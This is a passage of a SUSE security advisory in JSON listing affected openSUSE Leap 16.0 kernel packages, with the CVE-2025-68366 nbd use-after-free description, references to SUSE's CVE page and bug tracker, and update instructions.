"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-68361"
},
{
"cve": "CVE-2025-68366",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68366"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnbd: defer config unlock in nbd_genl_connect\n\nThere is one use-after-free warning when running NBD_CMD_CONNECT and\nNBD_CLEAR_SOCK:\n\nnbd_genl_connect\n nbd_alloc_and_init_config // config_refs=1\n nbd_start_device // config_refs=2\n set NBD_RT_HAS_CONFIG_REF\t\t\topen nbd // config_refs=3\n recv_work done // config_refs=2\n\t\t\t\t\t\tNBD_CLEAR_SOCK // config_refs=1\n\t\t\t\t\t\tclose nbd // config_refs=0\n refcount_inc -\u003e uaf\n\n------------[ cut here ]------------\nrefcount_t: addition on 0; use-after-free.\nWARNING: CPU: 24 PID: 1014 at lib/refcount.c:25 refcount_warn_saturate+0x12e/0x290\n nbd_genl_connect+0x16d0/0x1ab0\n genl_family_rcv_msg_doit+0x1f3/0x310\n genl_rcv_msg+0x44a/0x790\n\nThe issue can be easily reproduced by adding a small delay before\nrefcount_inc(\u0026nbd-\u003econfig_refs) in nbd_genl_connect():\n\n mutex_unlock(\u0026nbd-\u003econfig_lock);\n if (!ret) {\n set_bit(NBD_RT_HAS_CONFIG_REF, \u0026config-\u003eruntime_flags);\n+ printk(\"before sleep\\n\");\n+ mdelay(5 * 1000);\n+ printk(\"after sleep\\n\");\n refcount_inc(\u0026nbd-\u003econfig_refs);\n nbd_connect_reply(info, nbd-\u003eindex);\n }",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68366",
"url": "https://www.suse.com/security/cve/CVE-2025-68366"
},
{
"category": "external",
"summary": "SUSE Bug 1255622 for CVE-2025-68366",
"url": "https://bugzilla.suse.com/1255622"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
